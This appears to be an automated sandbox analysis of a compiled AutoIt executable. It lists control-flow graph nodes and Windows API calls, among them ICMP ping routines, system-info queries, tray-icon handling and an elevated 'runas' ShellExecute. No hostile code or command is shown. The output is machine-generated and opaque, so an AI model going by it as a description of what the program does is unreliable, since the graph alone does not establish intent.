API calls 99370->99372 99373 9dd715 99371->99373 99374 a150d0 99372->99374 99523 9e3b7b 65 API calls Mailbox 99373->99523 99379 a150e4 99374->99379 99510 9e3ea1 99374->99510 99378 9dd724 99381 a150e8 _memmove 99378->99381 99524 9d4f3c 59 API calls Mailbox 99378->99524 99379->99381 99513 a37c7f 99379->99513 99382 9dd738 Mailbox 99383 9dd772 99382->99383 99384 9e42cf FindCloseChangeNotification 99382->99384 99383->99310 99385 9dd766 99384->99385 99385->99383 99525 9e3f0b FindCloseChangeNotification 99385->99525 99388 9d502b 59 API calls 99387->99388 99389 a46604 99388->99389 99390 a46624 99389->99390 99391 9d502b 59 API calls 99389->99391 99392 a46645 99390->99392 99393 9d523c 59 API calls 99390->99393 99391->99390 99392->99310 99393->99392 99396 a4ebcd 99394->99396 99395 9d4d37 84 API calls 99397 a4ec0a 99395->99397 99396->99395 99399 a4ebdc 99396->99399 99535 a37ce4 99397->99535 99399->99310 99401 a3d6e8 99400->99401 99402 a3d6dd 99400->99402 99404 a3d7c2 Mailbox 99401->99404 99407 9e1207 59 API calls 99401->99407 99403 9d502b 59 API calls 99402->99403 99403->99401 99405 9f0fe6 Mailbox 59 API calls 99404->99405 99428 a3d7cb Mailbox 99404->99428 99406 a3d80b 99405->99406 99408 a3d817 99406->99408 99576 9e3df7 60 API calls Mailbox 99406->99576 99409 a3d70c 99407->99409 99412 9d4d37 84 API calls 99408->99412 99411 9e1207 59 API calls 99409->99411 99413 a3d715 99411->99413 99414 a3d82f 99412->99414 99415 9d4d37 84 API calls 99413->99415 99416 9e3e47 67 API calls 99414->99416 99417 a3d721 99415->99417 99418 a3d83e 99416->99418 99419 9f0119 59 API calls 99417->99419 99420 a3d842 GetLastError 99418->99420 99421 a3d876 99418->99421 99422 a3d736 99419->99422 99424 a3d85b 99420->99424 99426 a3d8a1 99421->99426 99427 a3d8d8 99421->99427 99423 9e17e0 59 API calls 99422->99423 99425 a3d769 99423->99425 99424->99428 99577 9e3f0b FindCloseChangeNotification 99424->99577 99429 a3d793 Mailbox 99425->99429 99434 a3412a 3 API calls 99425->99434 99431 9f0fe6 Mailbox 59 API calls 99426->99431 99430 9f0fe6 Mailbox 59 API calls 99427->99430 99428->99310 99433 9d502b 59 API calls 99429->99433 99435 a3d8dd 99430->99435 99436 a3d8a6 99431->99436 99433->99404 99437 a3d779 99434->99437 99435->99428 99438 9e1207 59 API calls 99435->99438 99439 9e1207 59 API calls 99436->99439 99442 a3d8b7 99436->99442 99437->99429 99441 9e1a36 59 API calls 99437->99441 99438->99428 99439->99442 99443 a3d78a 99441->99443 99578 a3fc0d 59 API calls 2 library calls 99442->99578 99444 a33f1d 63 API calls 99443->99444 99444->99429 99446 a45e46 99445->99446 99447 a45e74 WSAStartup 99446->99447 99448 9d502b 59 API calls 99446->99448 99449 a45e9d 99447->99449 99469 a45e88 Mailbox 99447->99469 99451 a45e61 99448->99451 99450 9e40cd 59 API calls 99449->99450 99452 a45ea6 99450->99452 99451->99447 99454 9d502b 59 API calls 99451->99454 99453 9d4d37 84 API calls 99452->99453 99455 a45eb2 99453->99455 99456 a45e70 99454->99456 99457 9e402a 61 API calls 99455->99457 99456->99447 99458 a45ebf inet_addr gethostbyname 99457->99458 99459 a45edd IcmpCreateFile 99458->99459 99458->99469 99460 a45f01 99459->99460 99459->99469 99461 9f0fe6 Mailbox 59 API calls 99460->99461 99462 a45f1a 99461->99462 99463 9e433f 59 API calls 99462->99463 99464 a45f25 99463->99464 99465 a45f34 IcmpSendEcho 99464->99465 99466 a45f55 IcmpSendEcho 99464->99466 99467 a45f6d 99465->99467 99466->99467 99468 a45fd4 IcmpCloseHandle WSACleanup 99467->99468 99468->99469 99469->99310 99471 9d4d37 84 API calls 99470->99471 99472 9dd001 99471->99472 99579 9d5278 99472->99579 99474 9dd018 99475 9dd57b 99474->99475 99476 9d502b 59 API calls 99474->99476 99485 9dd439 Mailbox __NMSG_WRITE 99474->99485 99475->99310 99476->99485 99478 9f0c65 62 API calls 99478->99485 99479 9e162d 59 API calls 99479->99485 99480 9d4f98 59 API calls 99480->99485 99483 9d4d37 84 API calls 99483->99485 99484 9d502b 59 API calls 99484->99485 99485->99475 99485->99478 99485->99479 99485->99480 99485->99483 99485->99484 99486 9e1821 59 API calls 99485->99486 99584 9f312d 99485->99584 99594 9e59d3 99485->99594 99605 9e5ac3 99485->99605 99609 9e153b 59 API calls 2 library calls 99485->99609 99610 9d4f3c 59 API calls Mailbox 99485->99610 99486->99485 99489->99335 99490->99303 99491->99295 99492->99305 99493->99308 99494->99299 99495->99299 99496->99310 99497->99317 99498->99332 99499->99336 99500->99284 99501->99332 99502->99284 99503->99332 99504->99332 99506 9e410a 2 API calls 99505->99506 99507 9e41f7 99506->99507 99508 9e410a 2 API calls 99507->99508 99509 9e420b 99508->99509 99509->99368 99528 9e4220 99510->99528 99514 a37c8a 99513->99514 99515 9f0fe6 Mailbox 59 API calls 99514->99515 99516 a37c91 99515->99516 99517 a37cbe 99516->99517 99518 a37c9d 99516->99518 99519 9f0fe6 Mailbox 59 API calls 99517->99519 99520 9f0fe6 Mailbox 59 API calls 99518->99520 99521 a37ca6 _memset 99519->99521 99520->99521 99521->99381 99522->99355 99523->99378 99524->99382 99525->99383 99526->99353 99527->99353 99529 9e4293 99528->99529 99533 9e422e 99528->99533 99534 9e42ae SetFilePointerEx 99529->99534 99530 9e3eb2 99530->99379 99532 9e4266 ReadFile 99532->99530 99532->99533 99533->99530 99533->99532 99534->99533 99536 a37cf1 99535->99536 99537 9f0fe6 Mailbox 59 API calls 99536->99537 99538 a37cf8 99537->99538 99541 a36135 99538->99541 99540 a37d3b Mailbox 99540->99399 99542 9e1aa4 59 API calls 99541->99542 99543 a36148 CharLowerBuffW 99542->99543 99545 a3615b 99543->99545 99544 9e1609 59 API calls 99544->99545 99545->99544 99546 a36165 _memset Mailbox 99545->99546 99548 a36195 99545->99548 99546->99540 99547 a361a7 99549 9f0fe6 Mailbox 59 API calls 99547->99549 99548->99547 99550 9e1609 59 API calls 99548->99550 99553 a361d5 99549->99553 99550->99547 99555 a361f4 99553->99555 99574 a36071 59 API calls 99553->99574 99554 a36233 99554->99546 99556 9f0fe6 Mailbox 59 API calls 99554->99556 99559 a36292 99555->99559 99557 a3624d 99556->99557 99558 9f0fe6 Mailbox 59 API calls 99557->99558 99558->99546 99560 9e1207 59 API calls 99559->99560 99561 a362c4 99560->99561 99562 9e1207 59 API calls 99561->99562 99563 a362cd 99562->99563 99564 9e1207 59 API calls 99563->99564 99571 a362d6 _wcscmp 99564->99571 99565 9e1821 59 API calls 99565->99571 99566 9e153b 59 API calls 99566->99571 99567 9f3836 GetStringTypeW 99567->99571 99569 9f37ba 59 API calls 99569->99571 99570 a36292 60 API calls 99570->99571 99571->99565 99571->99566 99571->99567 99571->99569 99571->99570 99572 a365ab Mailbox 99571->99572 99573 9e1c9c 59 API calls 99571->99573 99575 9f385c GetStringTypeW _iswctype 99571->99575 99572->99554 99573->99571 99574->99553 99575->99571 99576->99408 99577->99428 99578->99428 99580 9f0fe6 Mailbox 59 API calls 99579->99580 99581 9d5285 99580->99581 99582 9d5294 99581->99582 99583 9e1a36 59 API calls 99581->99583 99582->99474 99583->99582 99585 9f31ae 99584->99585 99586 9f3139 99584->99586 99613 9f31c0 60 API calls 3 library calls 99585->99613 99593 9f315e 99586->99593 99611 9f8d58 58 API calls __getptd_noexit 99586->99611 99588 9f31bb 99588->99485 99590 9f3145 99612 9f8fe6 9 API calls __strnicoll_l 99590->99612 99592 9f3150 99592->99485 99593->99485 99595 9e59fe _memset 99594->99595 99614 9e5800 99595->99614 99598 9e5a83 99600 9e5a9d Shell_NotifyIconW 99598->99600 99601 9e5ab9 Shell_NotifyIconW 99598->99601 99602 9e5aab 99600->99602 99601->99602 99618 9e56f8 99602->99618 99604 9e5ab2 99604->99485 99606 9e5b25 99605->99606 99607 9e5ad5 _memset 99605->99607 99606->99485 99608 9e5af4 Shell_NotifyIconW 99607->99608 99608->99606 99609->99485 99610->99485 99611->99590 99612->99592 99613->99588 99615 9e581c 99614->99615 99616 9e5810 99614->99616 99615->99616 99617 9e5821 DestroyIcon 99615->99617 99616->99598 99648 a334dd 62 API calls _W_store_winword 99616->99648 99617->99616 99619 9e57fa Mailbox 99618->99619 99620 9e5715 99618->99620 99619->99604 99621 9e162d 59 API calls 99620->99621 99622 9e5723 99621->99622 99623 a20c4c LoadStringW 99622->99623 99624 9e5730 99622->99624 99627 a20c66 99623->99627 99625 9e1821 59 API calls 99624->99625 99626 9e5745 99625->99626 99628 9e5752 99626->99628 99635 a20c74 99626->99635 99629 9e1c9c 59 API calls 99627->99629 99628->99627 99630 9e5760 99628->99630 99636 9e5778 _memset _wcscpy 99629->99636 99631 9e1900 59 API calls 99630->99631 99632 9e576a 99631->99632 99633 9e17e0 59 API calls 99632->99633 99633->99636 99634 a20cb7 Mailbox 99650 9f38c8 83 API calls 3 library calls 99634->99650 99635->99634 99635->99636 99637 9e1207 59 API calls 99635->99637 99638 9e57e0 Shell_NotifyIconW 99636->99638 99639 a20c9e 99637->99639 99638->99619 99649 a30252 60 API calls Mailbox 99639->99649 99642 a20cd6 99644 9e1900 59 API calls 99642->99644 99643 a20ca9 99645 9e17e0 59 API calls 99643->99645 99646 a20ce7 99644->99646 99645->99634 99647 9e1900 59 API calls 99646->99647 99647->99636 99648->99598 99649->99643 99650->99642 99651 9d7357 99652 9d7360 99651->99652 99653 9d78f5 99651->99653 99652->99653 99654 9d4d37 84 API calls 99652->99654 99660 9d6fdb Mailbox 99653->99660 99662 a287f9 59 API calls _memmove 99653->99662 99655 9d738b 99654->99655 99655->99653 99656 9d739b 99655->99656 99658 9e1680 59 API calls 99656->99658 99658->99660 99659 a0f91b 99661 9e1c9c 59 API calls 99659->99661 99661->99660 99662->99659 99663 9d4e96 99664 9f0fe6 Mailbox 59 API calls 99663->99664 99665 9d4e9d 99664->99665 99666 a392c8 99667 a392d5 99666->99667 99669 a392db 99666->99669 99668 9f2f85 _free 58 API calls 99667->99668 99668->99669 99670 a392ec 99669->99670 99671 9f2f85 _free 58 API calls 99669->99671 99672 a392fe 99670->99672 99673 9f2f85 _free 58 API calls 99670->99673 99671->99670 99673->99672 99674 9d1016 99679 9e5ce7 99674->99679 99677 9f2f70 __cinit 67 API calls 99678 9d1025 99677->99678 99680 9f0fe6 Mailbox 59 API calls 99679->99680 99681 9e5cef 99680->99681 99682 9d101b 99681->99682 99686 9e5f39 99681->99686 99682->99677 99687 9e5f42 99686->99687 99689 9e5cfb 99686->99689 99688 9f2f70 __cinit 67 API calls 99687->99688 99688->99689 99690 9e5d13 99689->99690 99691 9e1207 59 API calls 99690->99691 99692 9e5d2b GetVersionExW 99691->99692 99693 9e1821 59 API calls 99692->99693 99694 9e5d6e 99693->99694 99695 9e1981 59 API calls 99694->99695 99700 9e5d9b 99694->99700 99696 9e5d8f 99695->99696 99697 9e133d 59 API calls 99696->99697 99697->99700 99698 9e5e00 GetCurrentProcess IsWow64Process 99699 9e5e19 99698->99699 99702 9e5e2f 99699->99702 99703 9e5e98 GetSystemInfo 99699->99703 99700->99698 99701 a21098 99700->99701 99714 9e55f0 99702->99714 99705 9e5e65 99703->99705 99705->99682 99707 9e5e8c GetSystemInfo 99710 9e5e56 99707->99710 99708 9e5e41 99709 9e55f0 2 API calls 99708->99709 99711 9e5e49 GetNativeSystemInfo 99709->99711 99710->99705 99712 9e5e5c FreeLibrary 99710->99712 99711->99710 99712->99705 99715 9e5619 99714->99715 99716 9e55f9 LoadLibraryA 99714->99716 99715->99707 99715->99708 99716->99715 99717 9e560a GetProcAddress 99716->99717 99717->99715 99718 9d9a6c 99721 9d829c 99718->99721 99720 9d9a78 99722 9d82b4 99721->99722 99723 9d8308 99721->99723 99722->99723 99725 9d53b0 433 API calls 99722->99725 99724 9d8331 99723->99724 99730 a3a48d 89 API calls 4 library calls 99723->99730 99724->99720 99728 9d82eb 99725->99728 99727 a10ed8 99727->99727 99728->99724 99729 9d523c 59 API calls 99728->99729 99729->99723 99730->99727 99731 9d9a88 99734 9d86e0 99731->99734 99735 9d86fd 99734->99735 99736 a10ff8 99735->99736 99737 a10fad 99735->99737 99758 9d8724 99735->99758 99769 a4aad0 433 API calls __cinit 99736->99769 99740 a10fb5 99737->99740 99744 a10fc2 99737->99744 99737->99758 99738 9d5278 59 API calls 99738->99758 99767 a4b0e4 433 API calls 99740->99767 99742 9f2f70 __cinit 67 API calls 99742->99758 99759 9d898d 99744->99759 99768 a4b58c 433 API calls 3 library calls 99744->99768 99745 9d3f42 68 API calls 99745->99758 99746 a11289 99746->99746 99748 a111af 99771 a4ae3b 89 API calls 99748->99771 99751 9d8a17 99752 9d39be 68 API calls 99752->99758 99756 9d523c 59 API calls 99756->99758 99757 9d3c30 68 API calls 99757->99758 99758->99738 99758->99742 99758->99745 99758->99748 99758->99751 99758->99752 99758->99756 99758->99757 99758->99759 99760 9d53b0 433 API calls 99758->99760 99761 9e1c9c 59 API calls 99758->99761 99763 9d3938 68 API calls 99758->99763 99764 9d855e 433 API calls 99758->99764 99765 9d84e2 89 API calls 99758->99765 99766 9d835f 433 API calls 99758->99766 99770 a273ab 59 API calls 99758->99770 99759->99751 99772 a3a48d 89 API calls 4 library calls 99759->99772 99760->99758 99761->99758 99763->99758 99764->99758 99765->99758 99766->99758 99767->99744 99768->99759 99769->99758 99770->99758 99771->99759 99772->99746 99773 a101f8 99774 a101fa 99773->99774 99777 a34d18 SHGetFolderPathW 99774->99777 99778 9e1821 59 API calls 99777->99778 99779 a10203 99778->99779 99780 a0dc5a 99781 9f0fe6 Mailbox 59 API calls 99780->99781 99782 a0dc61 99781->99782 99784 9f0fe6 Mailbox 59 API calls 99782->99784 99786 a0dc7a _memmove 99782->99786 99783 9f0fe6 Mailbox 59 API calls 99785 a0dc9f 99783->99785 99784->99786 99786->99783 99787 9d1066 99792 9daaaa 99787->99792 99789 9d106c 99790 9f2f70 __cinit 67 API calls 99789->99790 99791 9d1076 99790->99791 99793 9daacb 99792->99793 99825 9f02eb 99793->99825 99797 9dab12 99798 9e1207 59 API calls 99797->99798 99799 9dab1c 99798->99799 99800 9e1207 59 API calls 99799->99800 99801 9dab26 99800->99801 99802 9e1207 59 API calls 99801->99802 99803 9dab30 99802->99803 99804 9e1207 59 API calls 99803->99804 99805 9dab6e 99804->99805 99806 9e1207 59 API calls 99805->99806 99807 9dac39 99806->99807 99835 9f0588 99807->99835 99811 9dac6b 99812 9e1207 59 API calls 99811->99812 99813 9dac75 99812->99813 99863 9efe2b 99813->99863 99815 9dacbc 99816 9daccc GetStdHandle 99815->99816 99817 9dad18 99816->99817 99818 a12f39 99816->99818 99819 9dad20 OleInitialize 99817->99819 99818->99817 99820 a12f42 99818->99820 99819->99789 99870 a370f3 64 API calls Mailbox 99820->99870 99822 a12f49 99871 a377c2 CreateThread 99822->99871 99824 a12f55 CloseHandle 99824->99819 99872 9f03c4 99825->99872 99828 9f03c4 59 API calls 99829 9f032d 99828->99829 99830 9e1207 59 API calls 99829->99830 99831 9f0339 99830->99831 99832 9e1821 59 API calls 99831->99832 99833 9daad1 99832->99833 99834 9f07bb 6 API calls 99833->99834 99834->99797 99836 9e1207 59 API calls 99835->99836 99837 9f0598 99836->99837 99838 9e1207 59 API calls 99837->99838 99839 9f05a0 99838->99839 99879 9e10c3 99839->99879 99842 9e10c3 59 API calls 99843 9f05b0 99842->99843 99844 9e1207 59 API calls 99843->99844 99845 9f05bb 99844->99845 99846 9f0fe6 Mailbox 59 API calls 99845->99846 99847 9dac43 99846->99847 99848 9eff4c 99847->99848 99849 9eff5a 99848->99849 99850 9e1207 59 API calls 99849->99850 99851 9eff65 99850->99851 99852 9e1207 59 API calls 99851->99852 99853 9eff70 99852->99853 99854 9e1207 59 API calls 99853->99854 99855 9eff7b 99854->99855 99856 9e1207 59 API calls 99855->99856 99857 9eff86 99856->99857 99858 9e10c3 59 API calls 99857->99858 99859 9eff91 99858->99859 99860 9f0fe6 Mailbox 59 API calls 99859->99860 99861 9eff98 RegisterWindowMessageW 99860->99861 99861->99811 99864 9efe3b 99863->99864 99865 a2620c 99863->99865 99866 9f0fe6 Mailbox 59 API calls 99864->99866 99882 a3a12a 59 API calls 99865->99882 99868 9efe43 99866->99868 99868->99815 99869 a26217 99870->99822 99871->99824 99883 a377a8 65 API calls 99871->99883 99873 9e1207 59 API calls 99872->99873 99874 9f03cf 99873->99874 99875 9e1207 59 API calls 99874->99875 99876 9f03d7 99875->99876 99877 9e1207 59 API calls 99876->99877 99878 9f0323 99877->99878 99878->99828 99880 9e1207 59 API calls 99879->99880 99881 9e10cb 99880->99881 99881->99842 99882->99869 99884 9f7e83 99885 9f7e8f __write 99884->99885 99921 9fa038 GetStartupInfoW 99885->99921 99888 9f7e94 99923 9f8dac GetProcessHeap 99888->99923 99889 9f7eec 99890 9f7ef7 99889->99890 100006 9f7fd3 58 API calls 3 library calls 99889->100006 99924 9f9d16 99890->99924 99893 9f7efd 99894 9f7f08 __RTC_Initialize 99893->99894 100007 9f7fd3 58 API calls 3 library calls 99893->100007 99945 9fd802 99894->99945 99897 9f7f17 99898 9f7f23 GetCommandLineW 99897->99898 100008 9f7fd3 58 API calls 3 library calls 99897->100008 99964 a05153 GetEnvironmentStringsW 99898->99964 99901 9f7f22 99901->99898 99904 9f7f3d 99905 9f7f48 99904->99905 100009 9f32e5 58 API calls 3 library calls 99904->100009 99974 a04f88 99905->99974 99908 9f7f4e 99911 9f7f59 99908->99911 100010 9f32e5 58 API calls 3 library calls 99908->100010 99988 9f331f 99911->99988 99912 9f7f61 99913 9f7f6c __wwincmdln 99912->99913 100011 9f32e5 58 API calls 3 library calls 99912->100011 99994 9e5f8b 99913->99994 99916 9f7f80 99917 9f7f8f 99916->99917 100012 9f3588 58 API calls _doexit 99916->100012 100013 9f3310 58 API calls _doexit 99917->100013 99920 9f7f94 __write 99922 9fa04e 99921->99922 99922->99888 99923->99889 100014 9f33b7 36 API calls 2 library calls 99924->100014 99926 9f9d1b 100015 9f9f6c InitializeCriticalSectionAndSpinCount __ioinit 99926->100015 99928 9f9d20 99929 9f9d24 99928->99929 100017 9f9fba TlsAlloc 99928->100017 100016 9f9d8c 61 API calls 2 library calls 99929->100016 99932 9f9d29 99932->99893 99933 9f9d36 99933->99929 99934 9f9d41 99933->99934 100018 9f8a05 99934->100018 99937 9f9d83 100026 9f9d8c 61 API calls 2 library calls 99937->100026 99940 9f9d62 99940->99937 99942 9f9d68 99940->99942 99941 9f9d88 99941->99893 100025 9f9c63 58 API calls 4 library calls 99942->100025 99944 9f9d70 GetCurrentThreadId 99944->99893 99946 9fd80e __write 99945->99946 99947 9f9e3b __lock 58 API calls 99946->99947 99948 9fd815 99947->99948 99949 9f8a05 __calloc_crt 58 API calls 99948->99949 99951 9fd826 99949->99951 99950 9fd891 GetStartupInfoW 99958 9fd9d5 99950->99958 99959 9fd8a6 99950->99959 99951->99950 99952 9fd831 __write @_EH4_CallFilterFunc@8 99951->99952 99952->99897 99953 9fda9d 100040 9fdaad LeaveCriticalSection _doexit 99953->100040 99955 9f8a05 __calloc_crt 58 API calls 99955->99959 99956 9fda22 GetStdHandle 99956->99958 99957 9fda35 GetFileType 99957->99958 99958->99953 99958->99956 99958->99957 100039 9fa05b InitializeCriticalSectionAndSpinCount 99958->100039 99959->99955 99959->99958 99961 9fd8f4 99959->99961 99960 9fd928 GetFileType 99960->99961 99961->99958 99961->99960 100038 9fa05b InitializeCriticalSectionAndSpinCount 99961->100038 99965 a05164 99964->99965 99966 9f7f33 99964->99966 100041 9f8a4d 58 API calls 2 library calls 99965->100041 99970 a04d4b GetModuleFileNameW 99966->99970 99968 a0518a _memmove 99969 a051a0 FreeEnvironmentStringsW 99968->99969 99969->99966 99971 a04d7f _wparse_cmdline 99970->99971 99973 a04dbf _wparse_cmdline 99971->99973 100042 9f8a4d 58 API calls 2 library calls 99971->100042 99973->99904 99975 a04fa1 __NMSG_WRITE 99974->99975 99976 a04f99 99974->99976 99977 9f8a05 __calloc_crt 58 API calls 99975->99977 99976->99908 99978 a04fca __NMSG_WRITE 99977->99978 99978->99976 99979 a05021 99978->99979 99981 9f8a05 __calloc_crt 58 API calls 99978->99981 99982 a05046 99978->99982 99985 a0505d 99978->99985 100043 a04837 58 API calls __strnicoll_l 99978->100043 99980 9f2f85 _free 58 API calls 99979->99980 99980->99976 99981->99978 99983 9f2f85 _free 58 API calls 99982->99983 99983->99976 100044 9f8ff6 IsProcessorFeaturePresent 99985->100044 99987 a05069 99987->99908 99989 9f332b __IsNonwritableInCurrentImage 99988->99989 100067 9fa701 99989->100067 99991 9f3349 __initterm_e 99992 9f2f70 __cinit 67 API calls 99991->99992 99993 9f3368 __cinit __IsNonwritableInCurrentImage 99991->99993 99992->99993 99993->99912 99995 9e6044 99994->99995 99996 9e5fa5 99994->99996 99995->99916 99997 9e5fdf IsThemeActive 99996->99997 100070 9f359c 99997->100070 100001 9e600b 100082 9e5f00 SystemParametersInfoW SystemParametersInfoW 100001->100082 100003 9e6017 100083 9e5240 100003->100083 100006->99890 100007->99894 100008->99901 100012->99917 100013->99920 100014->99926 100015->99928 100016->99932 100017->99933 100021 9f8a0c 100018->100021 100020 9f8a47 100020->99937 100024 9fa016 TlsSetValue 100020->100024 100021->100020 100023 9f8a2a 100021->100023 100027 a05426 100021->100027 100023->100020 100023->100021 100035 9fa362 Sleep 100023->100035 100024->99940 100025->99944 100026->99941 100028 a05431 100027->100028 100032 a0544c 100027->100032 100029 a0543d 100028->100029 100028->100032 100036 9f8d58 58 API calls __getptd_noexit 100029->100036 100031 a0545c HeapAlloc 100031->100032 100033 a05442 100031->100033 100032->100031 100032->100033 100037 9f35d1 DecodePointer 100032->100037 100033->100021 100035->100023 100036->100033 100037->100032 100038->99961 100039->99958 100040->99952 100041->99968 100042->99973 100043->99978 100045 9f9001 100044->100045 100050 9f8e89 100045->100050 100049 9f901c 100049->99987 100051 9f8ea3 _memset __call_reportfault 100050->100051 100052 9f8ec3 IsDebuggerPresent 100051->100052 100058 9fa385 SetUnhandledExceptionFilter UnhandledExceptionFilter 100052->100058 100054 9f8f87 __call_reportfault 100059 9fc826 100054->100059 100056 9f8faa 100057 9fa370 GetCurrentProcess TerminateProcess 100056->100057 100057->100049 100058->100054 100060 9fc82e 100059->100060 100061 9fc830 IsProcessorFeaturePresent 100059->100061 100060->100056 100063 a05b3a 100061->100063 100066 a05ae9 5 API calls 2 library calls 100063->100066 100065 a05c1d 100065->100056 100066->100065 100068 9fa704 EncodePointer 100067->100068 100068->100068 100069 9fa71e 100068->100069 100069->99991 100071 9f9e3b __lock 58 API calls 100070->100071 100072 9f35a7 DecodePointer EncodePointer 100071->100072 100135 9f9fa5 LeaveCriticalSection 100072->100135 100074 9e6004 100075 9f3604 100074->100075 100076 9f360e 100075->100076 100077 9f3628 100075->100077 100076->100077 100136 9f8d58 58 API calls __getptd_noexit 100076->100136 100077->100001 100079 9f3618 100137 9f8fe6 9 API calls __strnicoll_l 100079->100137 100081 9f3623 100081->100001 100082->100003 100084 9e524d __write_nolock 100083->100084 100085 9e1207 59 API calls 100084->100085 100086 9e5258 GetCurrentDirectoryW 100085->100086 100138 9e4ec8 100086->100138 100135->100074 100136->100079 100137->100081 100139 9e1207 59 API calls 100138->100139 100140 9e4ede 100139->100140 100248 9e5420 100140->100248 100142 9e4efc 100143 9e19e1 59 API calls 100142->100143 100144 9e4f10 100143->100144 100145 9e1c9c 59 API calls 100144->100145 100146 9e4f1b 100145->100146 100147 9d477a 59 API calls 100146->100147 100148 9e4f27 100147->100148 100149 9e1a36 59 API calls 100148->100149 100150 9e4f34 100149->100150 100151 9d39be 68 API calls 100150->100151 100152 9e4f44 Mailbox 100151->100152 100153 9e1a36 59 API calls 100152->100153 100154 9e4f68 100153->100154 100155 9d39be 68 API calls 100154->100155 100156 9e4f77 Mailbox 100155->100156 100157 9e1207 59 API calls 100156->100157 100158 9e4f94 100157->100158 100249 9e542d __write_nolock 100248->100249 100250 9e1821 59 API calls 100249->100250 100261 9e5590 Mailbox 100249->100261 100252 9e545f 100250->100252 100251 9e1609 59 API calls 100251->100252 100252->100251 100255 9e5495 Mailbox 100252->100255 100253 9e1609 59 API calls 100253->100255 100254 9e5563 100256 9e1a36 59 API calls 100254->100256 100254->100261 100255->100253 100255->100254 100258 9e1a36 59 API calls 100255->100258 100260 9e4c94 59 API calls 100255->100260 100255->100261 100257 9e5584 100256->100257 100259 9e4c94 59 API calls 100257->100259 100258->100255 100259->100261 100260->100255 100261->100142 101065 9d6981 101066 9d373a 59 API calls 101065->101066 101067 9d6997 101066->101067 101072 9d7b3f 101067->101072 101069 9d69bf 101070 9d584d 101069->101070 101084 a3a48d 89 API calls 4 library calls 101069->101084 101073 9e162d 59 API calls 101072->101073 101074 9d7b64 _wcscmp 101073->101074 101075 9d7b98 Mailbox 101074->101075 101076 9e1a36 59 API calls 101074->101076 101075->101069 101077 a0ffad 101076->101077 101078 9e17e0 59 API calls 101077->101078 101079 a0ffb8 101078->101079 101085 9d3938 68 API calls 101079->101085 101081 a0ffc9 101082 a0ffcd Mailbox 101081->101082 101083 9d523c 59 API calls 101081->101083 101082->101069 101083->101082 101084->101070 101085->101081 101086 9e4d83 101087 9e4dba 101086->101087 101088 9e4dd8 101087->101088 101089 9e4e37 101087->101089 101125 9e4e35 101087->101125 101090 9e4ead PostQuitMessage 101088->101090 101091 9e4de5 101088->101091 101093 a209c2 101089->101093 101094 9e4e3d 101089->101094 101127 9e4e28 101090->101127 101097 a20a35 101091->101097 101098 9e4df0 101091->101098 101092 9e4e1a DefWindowProcW 101092->101127 101141 9dc460 10 API calls Mailbox 101093->101141 101095 9e4e65 SetTimer RegisterWindowMessageW 101094->101095 101096 9e4e42 101094->101096 101102 9e4e8e CreatePopupMenu 101095->101102 101095->101127 101100 a20965 101096->101100 101101 9e4e49 KillTimer 101096->101101 101144 a32cce 97 API calls _memset 101097->101144 101103 9e4df8 101098->101103 101104 9e4eb7 101098->101104 101107 a2096a 101100->101107 101108 a2099e MoveWindow 101100->101108 101109 9e5ac3 Shell_NotifyIconW 101101->101109 101102->101127 101110 a20a1a 101103->101110 101111 9e4e03 101103->101111 101131 9e5b29 101104->101131 101106 a209e9 101142 9dc483 433 API calls Mailbox 101106->101142 101115 a2096e 101107->101115 101116 a2098d SetFocus 101107->101116 101108->101127 101117 9e4e5c 101109->101117 101110->101092 101143 a28854 59 API calls Mailbox 101110->101143 101118 9e4e9b 101111->101118 101123 9e4e0e 101111->101123 101112 a20a47 101112->101092 101112->101127 101119 a20977 101115->101119 101115->101123 101116->101127 101138 9d34e4 DeleteObject DestroyWindow Mailbox 101117->101138 101139 9e5bd7 107 API calls _memset 101118->101139 101140 9dc460 10 API calls Mailbox 101119->101140 101123->101092 101128 9e5ac3 Shell_NotifyIconW 101123->101128 101125->101092 101126 9e4eab 101126->101127 101129 a20a0e 101128->101129 101130 9e59d3 94 API calls 101129->101130 101130->101125 101132 9e5bc2 101131->101132 101133 9e5b40 _memset 101131->101133 101132->101127 101134 9e56f8 87 API calls 101133->101134 101136 9e5b67 101134->101136 101135 9e5bab KillTimer SetTimer 101135->101132 101136->101135 101137 a20d6e Shell_NotifyIconW 101136->101137 101137->101135 101138->101127 101139->101126 101140->101127 101141->101106 101142->101123 101143->101125 101144->101112

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009E526C
                                                        • IsDebuggerPresent.KERNEL32 ref: 009E527E
                                                        • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 009E52E6
                                                          • Part of subcall function 009E1821: _memmove.LIBCMT ref: 009E185B
                                                          • Part of subcall function 009DBBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 009DBC07
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 009E5366
                                                        • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00A20B2E
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00A20B66
                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00A86D10), ref: 00A20BE9
                                                        • ShellExecuteW.SHELL32(00000000), ref: 00A20BF0
                                                          • Part of subcall function 009E514C: GetSysColorBrush.USER32(0000000F), ref: 009E5156
                                                          • Part of subcall function 009E514C: LoadCursorW.USER32(00000000,00007F00), ref: 009E5165
                                                          • Part of subcall function 009E514C: LoadIconW.USER32(00000063), ref: 009E517C
                                                          • Part of subcall function 009E514C: LoadIconW.USER32(000000A4), ref: 009E518E
                                                          • Part of subcall function 009E514C: LoadIconW.USER32(000000A2), ref: 009E51A0
                                                          • Part of subcall function 009E514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 009E51C6
                                                          • Part of subcall function 009E514C: RegisterClassExW.USER32(?), ref: 009E521C
                                                          • Part of subcall function 009E50DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 009E5109
                                                          • Part of subcall function 009E50DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 009E512A
                                                          • Part of subcall function 009E50DB: ShowWindow.USER32(00000000), ref: 009E513E
                                                          • Part of subcall function 009E50DB: ShowWindow.USER32(00000000), ref: 009E5147
                                                          • Part of subcall function 009E59D3: _memset.LIBCMT ref: 009E59F9
                                                          • Part of subcall function 009E59D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 009E5A9E
                                                        Strings
